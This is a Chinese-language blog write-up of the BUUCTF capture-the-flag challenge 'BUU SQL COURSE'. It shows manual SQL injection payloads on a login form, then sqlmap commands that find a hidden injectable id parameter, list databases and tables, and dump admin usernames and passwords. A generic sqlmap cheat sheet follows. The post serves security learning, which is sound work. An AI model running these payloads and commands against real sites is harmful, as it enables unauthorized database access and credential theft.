【Baisc】BUU SQL COURSE

于 2024-05-18 21:20:35 发布
阅读量502 收藏 12
点赞数 26
分类专栏: BUUCTF解析 文章标签: sql 数据库 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46302361/article/details/139029364
版权

文章目录

前言

继续肝

一、BUU SQL COURSE

请添加图片描述
看标题大概率考的是SQL注入在这里插入图片描述
直奔注入点在这里插入图片描述
先简单的注入尝试一下

' OR '1'='1

请添加图片描述

admin' --

请添加图片描述

admin' OR '1'='1' --

请添加图片描述

' UNION SELECT 1,2,3 --

请添加图片描述
我淦咋都不行,直接上工具sqlmap启动在这里插入图片描述

打开控制台在这里插入图片描述
找到URL
在这里插入图片描述

sqlmap -u "目标URL" --data "username=你表单数据提交的admin&password=你表单数据提交的password"

请添加图片描述
请添加图片描述
6…用sqlmap检测到POST参数username和password都不是动态的,好一个声东击西emmmm

再次对页面进行分析在这里插入图片描述
既然注入点不在登陆里,那么大概率在热点里

进入检查找一找
请添加图片描述
我淦老六,藏这了…

秉承着能自动不手动的原则

sqlmap -u "目标URL" --batch

在这里插入图片描述
成功检测到URL并且id参数被检测为动态
继续分析在这里插入图片描述
检测到 id 参数存在SQL注入,并确认可以通过布尔盲注(Boolean-based blind)进行注入。

在这里插入图片描述
发现 id 参数还可以通过基于时间的盲注(Time-based blind)和通用联合查询(UNION query)进行注入。

在这里插入图片描述
以上这些就是检测到的注入点

下面咱们看看他后台都有哪些数据库

sqlmap -u "目标URL" --dbs

在这里插入图片描述
有6个库
默认系统库除外news,test,ctftraining具体在哪个呢咱们一个一个试试,先试试news吧

sqlmap -u "目标URL" -D news --tables

在这里插入图片描述
找到的俩表,这个admin很有可能是

接下来看看表里的所有列

sqlmap -u "目标URL" -D news -T admin --columns

在这里插入图片描述
欧呦,找到了

接下来提取一下这个表里的数据

sqlmap -u "目标URL" -D news -T admin --columns -C username,password --dump

在这里插入图片描述
找到账号和密码喽
登陆试一下在这里插入图片描述
小小flag,拿下!

二、知识点

sqlmap

sqlmap 是一个强大的自动化SQL注入工具,常用于渗透测试和安全审计。

基本用法:
这个基本命令用于检测和利用目标URL的SQL注入漏洞

sqlmap -u "目标URL"

指定HTTP方法
默认情况下,sqlmap 使用GET请求。你可以使用 --data 选项指定POST请求数据

sqlmap -u "http://example.com/login.php" --data "username=admin&password=admin"

指定参数
如果只想测试特定的参数,可以使用 -p 选项:

sqlmap -u "http://example.com/page.php?id=1&name=admin" -p id

列出数据库

sqlmap -u "http://example.com/page.php?id=1" --dbs

列出表

sqlmap -u "http://example.com/page.php?id=1" -D database_name --tables

列出列

sqlmap -u "http://example.com/page.php?id=1" -D database_name -T table_name --columns

提取数据

sqlmap -u "http://example.com/page.php?id=1" -D database_name -T table_name -C column1,column2 --dump

解题感悟

服了这道题真的老六,声东击西是给这出题者玩明白了。言归正传这道题考的是mysql注入和sqlmap工具的使用,整体难度偏低但是有陷阱,可以手动操作也可以用sqlmap自动扫,正常情况下可以先手动简单尝试注入,如果不行的话就直接上sqlmap,分析是否为动态是否有注入点。sqlmap在手,flag我有~

Hoxy.R
关注
  • 26
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Baisc-Calculator
05-02
Baisc计算器嘿,我是一个教育爱好者,这是我有史以来第一个html,css和js项目。 尝试一下,伙计们,帮助我改善它。
Baisc-Bankingsystem
03-10
Baisc银行系统
[BUUCTF][N1BOOK][第一章 web入门]SQL注入-2(详细解析)
weixin_66146598的博客
06-09 4873
[BUUCTF][N1BOOK][第一章 web入门]SQL注入-2(详细解析),《从0到1:CTFer成长之路》书籍配套题目之sql注入。1、有的网站会开启错误调试信息方便开发者调试,可以利用报错信息进行报错注入2、updatexml第二个参数应为合法XPATH路径,否则会在引发报错的同时输出传入的参数3、dual用于测试数据库是否可以正常使用4、如果没有报错提示,可以bool注入...
BUUCTF/BUU SQL COURSE 1
weixin_44041994的博客
03-19 469
登录按钮点击后是一个登陆界面,随意输入字符点击后显示提示信息"用户名或密码错误",并且抓包发现是提交的POST请求,可以对该登录界面进行暴破操作,但是因为需要猜解两个字段内容且密码内容无提示,时间需求比较久,且需要较庞大的字典。通过判断可知contents表应为热点新闻的数据表,admin大概率为用户表,所以我们构建sql根据表名查询该表下的各字段名,成功得到字段名:id,username,password。热点按钮显示热点列表,有三个新闻,里面只有无意义的字符串,但是地址栏显示了/content/1。
2024年最全BUUCTF BUU SQL COURSE 1_ctf sql 只提示用户名或密码错误(2),【面试必备
最新发布
2301_79098336的博客
05-05 632
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
BUU SQL COURSE 1
Lumos427的博客
05-18 2815
BUU SQL COURSE 1 01 注入点的查找 虽然页面上有登陆框,但是登录框里没有注入点,怎么测试都是用户名密码错误 当点进一个测试新闻里面,查看net就可以发现有提示的注入点 我们可以在url后加上来开始注入 02注入 ?id=1 order by 1 ?id=1 order by 2 ?id=1 order by 3 将页面上回显的字符串进行unicode解码,出现了下面的字符串, 可以发现,当列数为3时就没有了回显,所以进行注入的列数是两列 ?id=-1 union select 1,
ffmpeg-baisc.pdf
04-24
FFmpeg Basics Multimedia handling with a fast audio and video encoder pdf 格式
compressed sensing baisc pursuit
02-25
The recovery algorithm for compressed sensing
visula baisc
12-15
可以看看,多学点东西总是 好的吧
BUUCTF)BUU SQL COURSE 1
weixin_63442046的博客
04-28 1627
关于BUU SQL COURSE 1的思路
BUU SQL COURSE 11
WEB渗透测试 从入门到萌新
04-19 1259
打开之后 F12查看 http://7a0c2d1a-3ae3-4815-850d-9e229cef2e1f.node4.buuoj.cn:81/backend/content_detail.php?id=1 找到注入点 sql手工注入流程 1、判断注入类型 ?id=1 or 1=1 ?id=1' or '1'='1 2、判断列数:?id=1 order by 1,2,3 3、判断注入点:?id=-1 union select 1?id=-1 union select 1,2,3 ..
BUU SQL COURSE 1 1(SQL注入)
小谢的博客
10-25 3002
BUU SQL COURSE 1 1(SQL注入)题解
Buuctf | BUU SQL COURSE 1
m_de_g的博客
12-27 6005
BUU SQL COURSE 1 一、题目下载 https://buuoj.cn/challenges#BUU%20SQL%20COURSE%201 二、实战化演练 1.直接使用弱口令来进行测试 2.经过多次的测试,都无法注入,说明这个是写死的注册和登录,左边不是有热点吗?查看了一下跳转 3.通过访问backend/content_detail.php?id=1 4.通过修改后面的id=1,2,3,均会返回信息,直接使用SQL查询语句 1 and 1=1 5.我们尝试使用 1 and 1=2
【CTF练习】BUU SQL COURSE 1,2024年最新网络安全开发6年了
2401_84253089的博客
04-10 841
当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。id=-1 的使用是为了确保原始查询返回一个空集,从而避免与注入部分有重叠的数据。观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。
2024年全国职业技能大赛“网络安全赛项”国赛 模块B 任务解析(超详细)_2024年全国职业院校技能大赛高职组“网络空间安全(1)
2401_84247559的博客
04-26 453
最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。相比起繁琐的文字,还是生动的视频教程更加适合零基础的同学们学习,这里也是整理了一份与上述学习路线一一对应的网络安全视频教程。当然,当你入门之后,仅仅是视频教程已经不能满足你的需求了,你肯定需要学习各种工具的使用以及大量的实战项目,这里也分享一份。,毕竟实战是检验真理的唯一标准嘛~最后就是项目实战,这里带来的是。
SQLi-LABS 1-22关(Basic Challenges) 手动注入--(缓慢更新中 12/22)
燕麦葡萄干的博客
11-18 3449
首先判断注入类型,分别使用?时间注入是利用sleep()或benchmark()等函数让MySQL的执行时间变长,时间盲注多与if(expr1,expr2,expr3)结合使用,此if语句意思为:如果expr1是TRUE,则if()的返回值是expr2;进入到MySQL所在目录,我这里是D:\software\phpstudy_pro\Extensions\MySQL5.7.26\bin,目录栏直接输入cmd调出cmd终端,输入mysql -u root -p ,然后输入密码即可成功登陆数据库
baisc auth使用
05-25
Basic Authentication 是一种在 HTTP 请求头中发送用户名和密码的方法,以验证用户身份。它是最常见的身份验证方法之一,也是最简单的一种。 在使用 Basic Authentication 时,客户端将用户名和密码编码为 Base64 格式,并将其添加到 Authorization 请求头中。服务器收到请求后,会解码 Authorization 请求头并验证用户名和密码是否匹配。 以下是一个使用 Basic Authentication 的例子: ``` GET /api/users HTTP/1.1 Host: example.com Authorization: Basic dXNlcm5hbWU6cGFzc3dvcmQ= ``` 在上面的例子中,用户名是 "username",密码是 "password"。这些凭据已经被编码为 Base64 格式,并作为 Authorization 请求头的值发送给服务器。 在服务端实现 Basic Authentication 时,需要对请求头中的 Authorization 进行解析,并验证用户名和密码是否匹配。可以使用各种编程语言和框架来实现 Basic Authentication,如 PHP、Java、Python 和 Node.js 等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值